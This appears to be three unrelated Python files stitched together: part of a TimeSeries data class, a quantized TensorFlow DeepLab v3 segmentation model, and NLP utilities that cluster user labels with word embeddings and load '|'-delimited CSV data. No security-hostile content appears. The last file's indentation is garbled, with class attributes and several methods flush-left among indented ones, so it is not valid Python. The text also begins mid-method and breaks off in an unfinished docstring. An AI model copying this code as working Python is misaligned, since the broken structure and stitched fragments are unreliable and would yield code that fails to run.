            if isinstance(self.measurement, np.ndarray):
                self.error = np.broadcast_to(self.error, self.measurement.shape)
            else:
                raise ValueError(
                    "Errors for each channel must be provided if"
                    " m is a ragged array."
                )
        if not (
            _compatible_shapes(self.measurement, self.time)
            and _compatible_shapes(self.measurement, self.error)
        ):
            raise ValueError(
                "times, values, errors are not of compatible"
                " types/sizes. Please refer to the docstring"
                " for list of allowed input types."
            )
        self.label = label
        # BUG FIX: `meta_features={}` was a mutable default argument; default
        # to None and copy any provided mapping instead.
        self.meta_features = dict(meta_features) if meta_features is not None else {}
        self.name = name
        self.path = path
        if channel_names is None:
            self.channel_names = [f"channel_{i}" for i in range(self.n_channels)]
        else:
            self.channel_names = channel_names

    def channels(self):
        """Iterates over measurement channels (whether one or multiple)."""
        t_channels = self.time
        m_channels = self.measurement
        e_channels = self.error
        # Shared 1-d time/error arrays are broadcast so every channel yields
        # a (t, m, e) triple of equal-length arrays.
        if isinstance(self.time, np.ndarray) and self.time.ndim == 1:
            t_channels = np.broadcast_to(self.time, (self.n_channels, len(self.time)))
        if isinstance(self.measurement, np.ndarray) and self.measurement.ndim == 1:
            m_channels = np.broadcast_to(
                self.measurement, (self.n_channels, len(self.measurement))
            )
        if isinstance(self.error, np.ndarray) and self.error.ndim == 1:
            e_channels = np.broadcast_to(self.error, (self.n_channels, len(self.error)))
        return zip(t_channels, m_channels, e_channels)

    def sort(self):
        """Sort times, measurements, and errors by time (in place)."""
        if _ndim(self.time) == 1:
            # One shared time axis: a single permutation re-orders everything.
            inds = np.argsort(self.time)
            self.time = self.time[inds]
            if _ndim(self.measurement) == 1:
                self.measurement = self.measurement[inds]
            else:
                for i in range(len(self.measurement)):
                    self.measurement[i] = self.measurement[i][inds]
            if _ndim(self.error) == 1:
                self.error = self.error[inds]
            else:
                for i in range(len(self.error)):
                    self.error[i] = self.error[i][inds]
        else:  # if time is 2d, so are measurement and error
            for i in range(len(self.time)):
                inds = np.argsort(self.time[i])
                self.time[i] = self.time[i][inds]
                self.measurement[i] = self.measurement[i][inds]
                self.error[i] = self.error[i][inds]

    def save(self, path=None):
        """Store TimeSeries object as a single .npz file.

        Attributes are stored in the following arrays:
        - time
        - measurement
        - error
        - meta_feat_names
        - meta_feat_values
        - name
        - label

        If `path` is omitted then the `path` attribute from the TimeSeries
        object is used.
        """
        if path is None:
            path = self.path
        data = {
            "meta_feat_names": list(self.meta_features.keys()),
            "meta_feat_values": list(self.meta_features.values()),
        }
        for key in ["time", "measurement", "error"]:
            value = getattr(self, key)
            if isinstance(value, np.ndarray):
                data[key] = value
            else:  # list of arrays -> save each channel separately
                for i, value_i in enumerate(value):
                    data[key + str(i)] = value_i
        # BUG FIX: these used to be truthiness checks (``if self.name:`` /
        # ``if self.label:``) which silently dropped falsy values such as a
        # label of 0, 0.0, or False from the saved file.
        if self.name is not None:
            data["name"] = self.name
        if self.label is not None:
            data["label"] = self.label
        np.savez(path, **data)
|
# -*- coding: utf-8 -*-
"""ResNet model.
Related papers:
https://arxiv.org/pdf/1603.05027v2.pdf
https://arxiv.org/pdf/1512.03385v1.pdf
https://arxiv.org/pdf/1605.07146v1.pdf
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.training import moving_averages
import tensorflow as tf
from quantization import QW,QA,QE,QBits,bitsU,clip
from quantization import QBNG,QBNB,QBNM,QBNV,QBNX,QEBN#batch quant
# Subtract the per-channel mean from the input so it matches the preprocessing used when fine-tuning resnet_v2_50.
_R_MEAN = 123.68
_G_MEAN = 116.78
_B_MEAN = 103.94
class Deeplab_v3():
    """DeepLab v3 segmentation model on a ResNet-v2-50 backbone, with
    quantization hooks (QW/QA/QE/QBN*) applied to weights, activations and
    batch-norm statistics.  Built as a TF1 graph via forward_pass().
    """
    def __init__(self,
                 output_class,
                 batch_norm_decay=0.99,
                 batch_norm_epsilon=1e-3,
                 is_training=True,):
        # output_class: number of segmentation classes produced by the logits层.
        self._batch_norm_decay = batch_norm_decay
        self._batch_norm_epsilon = batch_norm_epsilon
        self._is_training = tf.cast(is_training,dtype=tf.bool)
        self.num_class = output_class
        # ResNet-50 stage widths; strides/n follow the standard (3,4,6,3) layout.
        self.filters = [64, 256, 512, 1024, 2048]
        self.strides = [2, 2, 1, 1]
        self.n = [3, 4, 6, 3]
        # Collected assign ops that quantize / clip every conv weight variable.
        self.W_q_op = []
        self.W_clip_op = []

    def forward_pass(self, x):
        """Build the core model within the graph"""
        with tf.variable_scope('resnet_v2_50'):
            size = tf.shape(x)[1:3]
            # Per-channel mean subtraction to match resnet_v2_50 preprocessing.
            x = x - [_R_MEAN, _G_MEAN, _B_MEAN]
            # Stem: 7x7/2 conv (kept unquantized) + 3x3/2 max pool.
            x = self._conv_no_q(x, 7, 64, 2, 'conv1', False, False)
            x = self._max_pool(x, 3, 2, 'max')
            res_func = self._bottleneck_residual_v2
            for i in range(4):
                with tf.variable_scope('block%d' % (i + 1)):
                    for j in range(self.n[i]):
                        with tf.variable_scope('unit_%d' % (j + 1)):
                            if j == 0:
                                x = res_func(x, self.filters[i], self.filters[i+1], 1)
                            elif j == self.n[i] - 1:
                                # Stride applied in the last unit of each block (v2 style).
                                x = res_func(x, self.filters[i+1], self.filters[i+1], self.strides[i])
                            else:
                                x = res_func(x, self.filters[i+1], self.filters[i+1], 1)
                    tf.logging.info('the shape of features after block%d is %s' % (i+1, x.get_shape()))
            # DeepLab v3 head: ASPP, 1x1 classifier, upsample back to input size.
            with tf.variable_scope('DeepLab_v3'):
                x = self._atrous_spatial_pyramid_pooling(x)
                x = self._conv_no_q(x, 1, self.num_class, 1, 'logits', False, False)
                x = tf.image.resize_bilinear(x, size)
            return x

    def _atrous_spatial_pyramid_pooling(self, x):
        """Atrous Spatial Pyramid Pooling (ASPP): image-level features plus
        1x1 and three dilated 3x3 branches (rates 6/12/18), concatenated and
        fused with a 1x1 conv.
        """
        with tf.variable_scope('ASSP_layers'):
            feature_map_size = tf.shape(x)
            image_level_features = tf.reduce_mean(x, [1, 2], keep_dims=True)
            image_level_features = self._conv(image_level_features, 1, 256, 1, 'global_avg_pool', True)
            image_level_features = tf.image.resize_bilinear(image_level_features, (feature_map_size[1],
                                                                                   feature_map_size[2]))
            at_pool1x1 = self._conv(x, kernel_size=1, filters=256, strides=1, scope='assp1', batch_norm=True)
            at_pool3x3_1 = self._conv(x, kernel_size=3, filters=256, strides=1, scope='assp2', batch_norm=True, rate=6)
            at_pool3x3_2 = self._conv(x, kernel_size=3, filters=256, strides=1, scope='assp3', batch_norm=True, rate=12)
            at_pool3x3_3 = self._conv(x, kernel_size=3, filters=256, strides=1, scope='assp4', batch_norm=True, rate=18)
            net = tf.concat((image_level_features, at_pool1x1, at_pool3x3_1, at_pool3x3_2, at_pool3x3_3), axis=3)
            net = self._conv(net, kernel_size=1, filters=256, strides=1, scope='concat', batch_norm=True)
            return net

    def _bottleneck_residual_v2(self,
                                x,
                                in_filter,
                                out_filter,
                                stride,):
        """Bottleneck residual unit with 3 sub layers, plan B shortcut."""
        with tf.variable_scope('bottleneck_v2'):
            origin_x = x
            # Pre-activation (BN + ReLU), then quantize the activation.
            with tf.variable_scope('preact'):
                preact = self._batch_norm(x)
                self._activation_summary(preact,"BN_Q")
                preact = self._relu(preact)
                preact = QA(preact)#<---------------------------
                preact = QEBN(preact)#<---------------------------
                self._activation_summary(preact,"activation_Q")
            residual = self._conv(preact, 1, out_filter // 4, stride, 'conv1', True, True)
            residual = self._conv(residual, 3, out_filter // 4, 1, 'conv2', True, True)
            residual = self._conv(residual, 1, out_filter, 1, 'conv3', False, False)
            # Plan B: project with 1x1 conv when channel counts differ,
            # otherwise subsample the raw input.
            if in_filter != out_filter:
                short_cut = self._conv(preact, 1, out_filter, stride, 'shortcut', False, False)
            else:
                short_cut = self._subsample(origin_x, stride, 'shortcut')
            x = tf.add(residual, short_cut)
            return x

    def _conv(self,
              x,
              kernel_size,
              filters,
              strides,
              scope,
              batch_norm=False,
              activation=False,
              rate=None
              ):
        """Convolution with weight quantization; `rate` switches to atrous
        convolution.  Optionally followed by batch norm and quantized ReLU.
        """
        with tf.variable_scope(scope):
            x_shape = x.get_shape().as_list()
            w = tf.get_variable(name='weights',
                                shape=[kernel_size, kernel_size, x_shape[3], filters])
            # Assign ops so the training loop can quantize / clip the stored weights.
            self.W_q_op.append(tf.assign(w,QBits(w,bitsU)))
            self.W_clip_op.append(tf.assign(w,clip(w,bitsU)))
            w = QW(w)#<---------------------------
            tf.add_to_collection("weights_Q", w)
            self._activation_summary(w,"weight_Q")
            if rate == None:
                x = tf.nn.conv2d(input=x,
                                 filter=w,
                                 padding='SAME',
                                 strides=[1, strides, strides, 1],
                                 name='conv', )
            else:
                x = tf.nn.atrous_conv2d(value=x,
                                        filters=w,
                                        padding='SAME',
                                        name='conv',
                                        rate=rate)
            x = QE(x)#<---------------------------
            self._activation_summary(x,"conv_out")
            if batch_norm:
                with tf.variable_scope('BatchNorm'):
                    x = self._batch_norm(x)
                    self._activation_summary(x,"BN_out")
            # else:
            #     b = tf.get_variable(name='biases', shape=[filters])
            #     x = x + b
            if activation:
                x = tf.nn.relu(x)
                x = QA(x)#<---------------------------
                x = QEBN(x)#<---------------------------
                self._activation_summary(x,"activation_Q")
            return x

    def _conv_no_q(self,
                   x,
                   kernel_size,
                   filters,
                   strides,
                   scope,
                   batch_norm=False,
                   activation=False,
                   rate=None
                   ):
        """Convolution without any quantization (used for the stem and the
        final logits layer); otherwise mirrors _conv().
        """
        with tf.variable_scope(scope):
            x_shape = x.get_shape().as_list()
            w = tf.get_variable(name='weights',
                                shape=[kernel_size, kernel_size, x_shape[3], filters])
            self._activation_summary(w,"weight_Q")
            if rate == None:
                x = tf.nn.conv2d(input=x,
                                 filter=w,
                                 padding='SAME',
                                 strides=[1, strides, strides, 1],
                                 name='conv', )
            else:
                x = tf.nn.atrous_conv2d(value=x,
                                        filters=w,
                                        padding='SAME',
                                        name='conv',
                                        rate=rate)
            self._activation_summary(x,"conv_out")
            if batch_norm:
                with tf.variable_scope('BatchNorm'):
                    x = self._batch_norm(x)
                    self._activation_summary(x,"BN_out")
            # else:
            #     b = tf.get_variable(name='biases', shape=[filters])
            #     x = x + b
            if activation:
                x = tf.nn.relu(x)
                self._activation_summary(x,"activation_Q")
            return x

    def _L1BN(self, x, mean, variance, offset, scale, variance_epsilon, name=None):
        # Batch norm with a custom (L1-style) gradient; mean/variance/gamma/
        # beta all pass through the QBN* quantizers.  NOTE(review): `std` here
        # is (variance + eps) without a square root — presumably `variance`
        # is already an L1 deviation; confirm against _batch_norm below.
        @tf.custom_gradient
        def cal_bn(x,mean,variance,variance_epsilon):
            def grad(dy):
                x_norm = x_bn
                shape = x_norm.get_shape().as_list()
                reduce_axis = [0, 1, 2] if len(shape) == 4 else [0]
                grad_y = dy
                grad_y_mean = tf.reduce_mean(grad_y, reduce_axis)
                mean = tf.reduce_mean(grad_y * x_norm, reduce_axis)
                sign = tf.sign(x_norm)
                sign_mean = tf.reduce_mean(sign, reduce_axis)
                grad_x = std * (grad_y - grad_y_mean - (sign - sign_mean) * mean)
                return grad_x,None,None,None
            mean=QBNM(mean)#quantize mean
            std=(variance + variance_epsilon)#quantize variance
            std=QBNV(std)#add a small value
            x_bn = (x - mean) / std#compute normalized x hat
            return x_bn,grad
        x = cal_bn(x, mean, variance, variance_epsilon)
        # x = cal_bn(x, mean)
        if scale is not None:
            scale = QBNG(scale)#quantize gamma
            x = x * scale#compute scaled
        if offset is not None:
            offset = QBNB(offset)#quantize betta
            x = x + offset#compute offseted
        x=QBNX(x)#quantize x hat
        #x=fbn_x(x)
        return x

    def _L2BN(self, x, mean, variance, offset, scale, variance_epsilon, name=None):
        # Quantized batch norm used by _batch_norm(): normalize with quantized
        # statistics, then apply quantized gamma/beta.  NOTE(review): no sqrt
        # is taken on `variance` here either — consistent with _batch_norm
        # computing an L1 (mean absolute deviation) statistic.
        mean=QBNM(mean)#quantize mean
        # std=tf.sqrt(variance + variance_epsilon)#quantize variance
        std=variance + variance_epsilon#quantize variance
        std=QBNV(std)#add a small value
        x = (x - mean) / std#compute normalized x hat
        x=QBNX(x)#quantize x hat
        if scale is not None:
            scale = QBNG(scale)#quantize gamma
            x = x * scale#compute scaled
        if offset is not None:
            offset = QBNB(offset)#quantize betta
            x = x + offset#compute offseted
        # x=QBNX(x)#quantize x hat
        #x=fbn_x(x)
        return x
        # with tf.name_scope(name, "batchnorm", [x, mean, variance, scale, offset]):
        #     inv = tf.rsqrt(variance + variance_epsilon)
        #     if scale is not None:
        #         inv *= scale
        #     return x * tf.cast(inv, x.dtype) + tf.cast(
        #         offset - mean * inv if offset is not None else -mean * inv, x.dtype)
        # mean = QBNM(mean)#quantize mean
        # inv = tf.rsqrt(variance + variance_epsilon)
        # inv = QBNV(inv)
        # scale = QBNG(scale)
        # offset = QBNB(offset)
        # inv *= scale
        # return x * tf.cast(inv, x.dtype) + tf.cast(
        #     offset - mean * inv if offset is not None else -mean * inv, x.dtype)
        # mean = QBNM(mean)#quantize mean
        # # inv = tf.rsqrt(variance + variance_epsilon)
        # inv = tf.sqrt(variance + variance_epsilon)
        # inv = QBNV(inv)
        # x = (x - mean) / inv
        #
        # # inv = QBNV(inv)
        # scale = QBNG(scale)
        # x = x * scale
        # offset = QBNB(offset)
        # x = x + offset
        # x = QBNX(x)
        # # x = x * tf.cast(inv, x.dtype)
        # # x = x + tf.cast(offset - mean * inv, x.dtype)
        # # x = x * inv
        # # x = x + offset - mean * inv
        # return x

    def _batch_norm(self, x):
        # Batch normalization with moving-average statistics.  Note the
        # "variance" tracked here is mean(|x - mean|), an L1 deviation, not
        # the usual squared variance — it feeds _L2BN which takes no sqrt.
        x_shape = x.get_shape()
        params_shape = x_shape[-1:]
        axis = list(range(len(x_shape) - 1))
        beta = tf.get_variable(name='beta',
                               shape=params_shape,
                               initializer=tf.zeros_initializer)
        gamma = tf.get_variable(name='gamma',
                                shape=params_shape,
                                initializer=tf.ones_initializer)
        moving_mean = tf.get_variable(name='moving_mean',
                                      shape=params_shape,
                                      initializer=tf.zeros_initializer,
                                      trainable=False)
        moving_variance = tf.get_variable(name='moving_variance',
                                          shape=params_shape,
                                          initializer=tf.ones_initializer,
                                          trainable=False)
        tf.add_to_collection('BN_MEAN_VARIANCE', moving_mean)
        tf.add_to_collection('BN_MEAN_VARIANCE', moving_variance)
        # These ops will only be preformed when training.
        # mean, variance = tf.nn.moments(x, axis)
        mean = tf.reduce_mean(x, axis=axis)
        variance = tf.reduce_mean(tf.abs(x - mean), axis=axis)
        update_moving_mean = moving_averages.assign_moving_average(moving_mean,
                                                                   mean,
                                                                   self._batch_norm_decay,
                                                                   name='MovingAvgMean')
        update_moving_variance = moving_averages.assign_moving_average(moving_variance,
                                                                       variance,
                                                                       self._batch_norm_decay,
                                                                       name='MovingAvgVariance')
        tf.add_to_collection(tf.GraphKeys.UPDATE_OPS, update_moving_mean)
        tf.add_to_collection(tf.GraphKeys.UPDATE_OPS, update_moving_variance)
        # Batch statistics while training; moving averages at inference.
        mean, variance = tf.cond(
            pred=self._is_training,
            true_fn=lambda: (mean, variance),
            false_fn=lambda: (moving_mean, moving_variance)
        )
        x = self._L2BN(x, mean, variance, beta, gamma, self._batch_norm_epsilon)
        return x

    def _relu(self, x):
        return tf.nn.relu(x)

    def _max_pool(self, x, pool_size, stride, scope):
        with tf.name_scope('max_pool') as name_scope:
            x = tf.layers.max_pooling2d(
                x, pool_size, stride, 'SAME', name=scope
            )
        return x

    #did not use
    def _avg_pool(self, x, pool_size, stride):
        with tf.name_scope('avg_pool') as name_scope:
            x = tf.layers.average_pooling2d(
                x, pool_size, stride, 'SAME')
        tf.logging.info('image after unit %s: %s', name_scope, x.get_shape())
        return x

    #did not use? need to check using print
    def _global_avg_pool(self, x):
        with tf.name_scope('global_avg_pool') as name_scope:
            assert x.get_shape().ndims == 4
            x = tf.reduce_mean(x, [1, 2])
        tf.logging.info('image after unit %s: %s', name_scope, x.get_shape())
        return x

    def _concat(self, x, y):
        with tf.name_scope('concat') as name_scope:
            assert x.get_shape().ndims == 4
            assert y.get_shape().ndims == 4
            x = tf.concat([x, y], 3)
        tf.logging.info('image after unit %s: %s', name_scope, x.get_shape())
        return x

    def _subsample(self, inputs, stride, scope=None):
        """Subsamples the input along the spatial dimensions."""
        if stride == 1:
            return inputs
        else:
            return self._max_pool(inputs, 3, stride, scope)

    # def _activation_summary(self, x, summary_type):
    #     tensor_name = summary_type
    #     tf.summary.histogram(tensor_name, x)
    #     mean = tf.reduce_mean(x)
    #     tf.summary.scalar(tensor_name + '/mean', mean)
    #     tf.summary.scalar(tensor_name + '/sttdev', tf.sqrt(tf.reduce_sum(tf.square(x - mean))))
    #     tf.summary.scalar(tensor_name + '/max', tf.reduce_max(x))
    #     tf.summary.scalar(tensor_name + '/min', tf.reduce_min(x))
    def _activation_summary(self, x, summary_type):
        # Summaries disabled: this stub intentionally records nothing.
        return x
|
"""
Utils for the approaches
"""
import math
from typing import Union, Optional, Tuple, List, Dict
# We executed the code on strong CPU clusters without an GPU (ssh compute). Because of this extraordinary
# executing environment, we introduce this flag. To reproduce the results in the paper, enable this flag.
execute_on_ssh_compute = False
import csv
import os
import pathlib
import pickle
import random
import datetime
from functools import reduce
import word_mover_distance.model as word_mover_distance
import loguru
import tensorflow
import numpy
from tensorflow import keras
import nltk
nltk.download("punkt")
nltk.download('universal_tagset')
nltk.download('averaged_perceptron_tagger')
nltk.download("stopwords")
from nltk.corpus import stopwords
setStopWords = set(stopwords.words("english"))
import re
import matplotlib
if execute_on_ssh_compute:
# see
# <https://stackoverflow.com/questions/37604289/tkinter-tclerror-no-display-name-and-no-display-environment-variable>
matplotlib.use("Agg")
from matplotlib import pyplot as plt
plt.rcParams["figure.figsize"] = (7.55, 4.0)
plt.rcParams["axes.titlesize"] = "small"
plt.rcParams["axes.titleweight"] = "light"
import Frames
from Frames import GenericFrame
logger = loguru.logger
# noinspection PyBroadException
class UserLabelCluster:
classes: []
classes_to_one_hot_encode_dict: dict
    def __init__(self, user_labels: List[str], word2vec_dict: dict, cluster_k: int, word2vec_embedding_size=300,
                 semantic_clustering=True, iteration=0):
        """
        Initiates a UserLabelCluster

        :param user_labels: the user label which will be available during training (do NOT input user labels
        = frames which are in validation or even test data!)
        :param word2vec_dict: the embedding dictionary, for example glove
        :param cluster_k: how many clusters do you want to have? Must be lower equal the number of user labels.
        However, there are some special cases:
        <ul>
            <li> 1: only one cluster, so, there is nothing to predict (making wrong)</li>
            <li> -1: clustering is disabled. It's the vanilla version:
                <code>
                    set_of_user_frames = {sample.get("frame", "n/a")
                    for sample in samples[: int(len(samples) * training_set_percent * 0.95)]}
                    dict_of_user_frames = {frame: num for num, frame in enumerate(set_of_user_frames)}
                    amount_clusters_dict_of_user_frames = max(dict_of_user_frames.values()) + 1
                </code>
        </ul>
        :param word2vec_embedding_size: the size of each word2vec embedding
        :param semantic_clustering: determines whether a semantic clustering should be enabled.
        <ul>
            <li><code>True</code>: user labels go through a preprocessing:
                removing stopwords, emphasise keywords, ...</li>
            <li><code>False:</code>: plain vanilla user label is used</li>
        </ul>
        :param iteration: index used to distinguish cached cluster pickle files across runs
        """
        assert cluster_k == -1 or 1 <= cluster_k <= len(user_labels)
        self.classes = list()
        self.classes_to_one_hot_encode_dict = dict()
        self.word2vec_dict = word2vec_dict
        self.word2vec_embedding_size = word2vec_embedding_size
        self.cluster_k = cluster_k
        self.semantic_clustering = semantic_clustering
        # Register every training label (skipped in the degenerate 1-cluster case).
        if self.cluster_k != 1:
            for user_label in user_labels:
                self.insert_class(user_label=user_label)
        else:
            logger.warning("You choose a special case! "
                           "With only 1 big cluster, all data-points will lay in this cluster. "
                           "Hence, there is nothing to compute...")
        if self.cluster_k > 1:
            # Clustering results are cached on disk; the file name encodes the
            # label count, embedding size, semantic flag, k, and iteration.
            path = pathlib.Path("clusters", "{}x{}d_{}_{}c_{}.pkl".format(len(user_labels), word2vec_embedding_size,
                                                                          "semantic" if semantic_clustering else "",
                                                                          cluster_k, iteration))
            path.parent.mkdir(exist_ok=True, parents=True)
            if path.exists():
                logger.debug("You computed the clusters already once, here: {}", path.absolute())
                self.cluster, self.classes_to_one_hot_encode_dict = pickle.load(path.open(mode="rb"))
                logger.success("Successfully loaded the already computed cluster: {}", path.name)
            else:
                logger.trace("Compute the cluster now...")
                self.cluster = nltk.cluster.KMeansClusterer(num_means=self.cluster_k,
                                                            distance=nltk.cluster.cosine_distance,
                                                            repeats=10 + int(math.sqrt(self.cluster_k) * 3),
                                                            avoid_empty_clusters=True)
                self.finalize_class_set()
                logger.success("Yes, we will store it in \"{}\"", path.name)
                pickle.dump((self.cluster, self.classes_to_one_hot_encode_dict), path.open(mode="wb"))
                logger.trace("Pickling done: {}", path.stat())
        elif self.cluster_k == -1:
            logger.warning("You disabled the clustering!"
                           "Hence, it's possible that further predictions will lead to outputs like"
                           "\"Your input is in no particular \"class\"\"")
            # Without clustering, each distinct converted label gets its own index.
            self.classes_to_one_hot_encode_dict = {f: i for i, f in enumerate(self.classes)}
def insert_class(self, user_label: str) -> None:
"""
Inserts a new user label (frame) which should be used by the cluster
NOT RECOMMENDED TO USE FROM OUTSIDE!
:param user_label: the user label which should be inserted
:return: nothing - just updates the internal structure. Has no effect without using self.finalize_class_set
"""
logger.debug("Adds \"{}\" to the user label class", user_label)
if self.cluster_k == -1:
logger.debug("Clustering is disabled. Hence, just added to the list in set-semantic (current length: {})",
len(self.classes))
final_label_tokens = self.convert_label(user_label=user_label)
if final_label_tokens not in self.classes:
self.classes.append(final_label_tokens)
else:
logger.debug("\"{}\" was already in the list!", " ".join(final_label_tokens))
    def convert_label(self, user_label: str) -> Tuple[str]:
        """
        FOR INTERNAL USE ONLY!

        Normalizes a user label into exactly 4 tokens: tokenize, expand
        "v./vs." to "versus", optionally reorder by POS (nouns first, then
        verbs, then the rest, stopwords removed), then pad/truncate to 4.

        :param user_label: the user label (frame)
        :return: a converted tokenized Tuple-list for further processing
        """
        # Split a single "a/b" into "a b" (only the first slash).
        user_label = re.sub(string=user_label, pattern="(?<=\w)\/(?=\w)", repl=" ", count=1)
        final_label_tokens = nltk.word_tokenize(text=user_label, language="english", preserve_line=False)
        for i, token in enumerate(final_label_tokens):
            token = token.lower()
            if token == "v" or token == "v." or token == "vs" or token == "vs.":
                final_label_tokens[i] = "versus"
        if self.semantic_clustering:
            # POS-tag, drop stopwords, then emphasise nouns and verbs by
            # moving them to the front (reversed first, so later tokens of the
            # same POS come earlier).
            tagged_label = [t_tag for t_tag in nltk.pos_tag(tokens=final_label_tokens, lang="eng", tagset="universal")
                            if t_tag[0] not in setStopWords]
            tagged_label.reverse()
            final_label_tokens = [t_tag[0] for t_tag in tagged_label if t_tag[1] == "NOUN"] + \
                                 [t_tag[0] for t_tag in tagged_label if t_tag[1] == "VERB"] + \
                                 [t_tag[0] for t_tag in tagged_label if t_tag[1] not in ["NOUN", "VERB"]]
            logger.debug("Converted the user label \"{}\" to \"{}\"", user_label, " ".join(final_label_tokens))
        # Pad or truncate so the result always has exactly 4 tokens.
        if len(final_label_tokens) > 4:
            logger.warning("The label {} has more than 4 tokens: {}. Discard {}", final_label_tokens,
                           len(final_label_tokens), final_label_tokens[4:])
            final_label_tokens = final_label_tokens[:4]
        elif len(final_label_tokens) == 0:
            logger.warning("We receive an preprocessed user label which is empty!")
            final_label_tokens = ["<pad>"] * 4
        elif len(final_label_tokens) == 1:
            final_label_tokens = final_label_tokens * 4
        elif len(final_label_tokens) == 2:
            final_label_tokens = final_label_tokens * 2
        elif len(final_label_tokens) == 3:
            final_label_tokens.append(final_label_tokens[0])
        return tuple(final_label_tokens)
def finalize_class_set(self) -> None:
"""
UPDATES THE INTERNAL STRUCTURE
:return: nothing
"""
logger.info("We have {} distinct classes, let's cluster it!", len(self.classes))
logger.debug("Created a cluster instance {} and this will cluster {} samples", self.cluster, self.classes)
try:
assigned_clusters = self.cluster.cluster(vectors=[self.convert_str_list_to_vector(c) for c in self.classes],
assign_clusters=True, trace=not execute_on_ssh_compute)
except Exception:
logger.exception("Failed to cluster the actual class set ({} samples)", len(self.classes))
return
self.classes_to_one_hot_encode_dict.clear()
for i in range(len(self.classes)):
self.classes_to_one_hot_encode_dict[self.classes[i]] = assigned_clusters[i]
def convert_str_list_to_vector(self, string_list: Tuple[str]) -> numpy.ndarray:
"""
FOR INTERNAL USE ONLY!
:param string_list: a tuple list of tokens. Must be exactly 4
:return: a one-dimensional (concatenated) numpy-array. See word embeddings
"""
if len(string_list) != 4:
logger.error("convert_str_list_to_vector got a too short or long string list: {}. We return a zero-vector!",
string_list)
return numpy.zeros(shape=(self.word2vec_embedding_size +
self.word2vec_embedding_size / 2 +
self.word2vec_embedding_size / 3 +
self.word2vec_embedding_size / 4,),
dtype="float32"
)
ret = numpy.zeros(shape=(0,), dtype="float32")
for i, token in enumerate(string_list):
logger.trace("Process the {}. token \"{}\"", (i + 1), string_list[i])
ret = numpy.concatenate([ret,
numpy.average(
numpy.reshape(
self.word2vec_dict.get(string_list[i],
numpy.negative(
numpy.ones(
shape=(self.word2vec_embedding_size,),
dtype="float32")
)),
(int(self.word2vec_embedding_size / (i + 1)), (i + 1))
),
axis=1)],
axis=0)
return ret
def get_y(self, user_label: str) -> numpy.ndarray:
"""
Gets the ground truth one-hot-encoded label for the particular user label
:param user_label: a user label (frame)
:type user_label: str
:return: an numpy array
"""
final_user_label = self.convert_label(user_label=user_label)
if self.cluster_k == -1:
index = self.classes_to_one_hot_encode_dict.get(final_user_label, len(self.classes_to_one_hot_encode_dict))
ret = numpy.zeros(shape=(len(self.classes_to_one_hot_encode_dict) + 1,), dtype="float32")
ret[index] = 1.
return ret
elif self.cluster_k == 1:
return numpy.ones(shape=(1,), dtype="float32")
if final_user_label in self.classes_to_one_hot_encode_dict.keys():
cluster_index = self.classes_to_one_hot_encode_dict[final_user_label]
else:
logger.info("We never saw the converted user_label \"{}\" - predict the cluster for it!",
" ".join(final_user_label))
cluster_index = self.cluster.classify(vector=self.convert_str_list_to_vector(final_user_label))
logger.debug("The cluster index of {} is {} - add it to the dictionary!", final_user_label, cluster_index)
self.classes_to_one_hot_encode_dict[final_user_label] = cluster_index
ret = numpy.zeros(shape=(self.cluster_k,), dtype="float32")
ret[cluster_index] = 1.
return ret
def get_y_length(self) -> int:
"""
:return: the length of a returned vector by self.get_y
"""
if self.cluster_k == -1:
return len(self.classes_to_one_hot_encode_dict) + 1
return self.cluster_k
def __str__(self) -> str:
return "{}{}cluster_{}z{}".format("Semantic" if self.semantic_clustering else "",
"-{}d-".format(self.word2vec_embedding_size)
if self.word2vec_embedding_size != 300 else "",
len(self.classes),
self.get_y_length())
def load_csv(data_set: str, frames: Frames, filter_unknown_frames=True, shuffle_samples=True, under_sampling=False,
             limit_data=-1) -> List[dict]:
    """
    Loads a '|'-separated CSV data set into a list of row dictionaries.

    The first CSV row is interpreted as the scheme (column names); every further
    row becomes a dict ``{column_name: value}``.

    :param data_set: path to the CSV file (delimiter '|', quote char '"')
    :param frames: frame definitions; only consulted when under-sampling
    :param filter_unknown_frames: if True, unknown frames are silently dropped during under-sampling
    :param shuffle_samples: if True, samples are shuffled (and re-shuffled after under-sampling)
    :param under_sampling: if True, every frame is cut down to the size of the rarest frame
    :param limit_data: if >= 1, only the first ``limit_data`` rows are kept
    :return: the list of sample dictionaries
    """
    logger.info("Read data set at {}", os.path.abspath(data_set))
    data = []
    with open(data_set, newline="\n", encoding="utf-8") as csv_file:
        csv_reader = csv.reader(csv_file, delimiter="|", quotechar='"')
        scheme = None
        for row in csv_reader:
            if csv_reader.line_num == 1:
                # The very first line defines the column names.
                scheme = row
            elif scheme is None:
                logger.error("No scheme!")
                raise AttributeError
            else:
                logger.debug("Fetch {}", ', '.join(row))
                argument_mapping = dict()
                for i in range(len(row)):
                    try:
                        argument_mapping[scheme[i]] = row[i]
                    except IndexError as err:
                        # The row has more columns than the scheme -- keep what we can.
                        logger.warning(err)
                logger.debug("Collected {} elements.", len(argument_mapping))
                data.append(argument_mapping)
    if limit_data >= 1:
        logger.warning("You want to limit your test data! You want to scale it down to {}", limit_data)
        data = data[:limit_data]
        logger.info("Took the first {}", len(data))
    if under_sampling:
        logger.warning("Beware, that the current number of samples ({}) will reduce probably"
                       "by the activated under-sampling!", len(data))
    if shuffle_samples:
        random.shuffle(data)
    if under_sampling:
        # Bucket the samples by their generic frame first.
        distribution = {fn: [] for fn in frames.frame_names}
        if not filter_unknown_frames:
            distribution["__UNKNOWN__"] = []
        for sample in data:
            frame = frames.map_user_label_to_generic(sample.get("frame", "FETCH_ERROR"))[0][0]
            try:
                distribution[frame] += [sample]
            except KeyError as e:
                logger.debug("Exception {}", type(e))
                if filter_unknown_frames:
                    logger.trace("Unexpected frame: {}", frame)
                else:
                    logger.error("Unexpected frame: {}", frame)
        min_frame = min(distribution.items(), key=lambda item: len(item[1]))
        if len(min_frame[1]) <= 0:
            logger.critical(
                "You activated the under-sampling, but frame {} has zero members... Hence, you discard all!",
                min_frame[0])
            # NOTE(review): exit() kills the whole process; consider raising instead.
            exit(1)
        else:
            logger.info("Under-sample now... key point is {}", min_frame)
            data = []
            for frame, samples in distribution.items():
                # BUGFIX: log the *number* of gathered samples, not the whole sample list.
                logger.debug("Gather {} samples now for frame \"{}\"", len(min_frame[1]), frame)
                data.extend(samples[:len(min_frame[1])])
            logger.warning("Your data is reduced to {} samples by under-sampling", len(data))
            if shuffle_samples:
                # Re-shuffle: the data is grouped by frame at this point.
                random.shuffle(data)
    return data
def load_word_embeddings(glove_file: pathlib.Path, embedding_size: int) -> dict:
    """
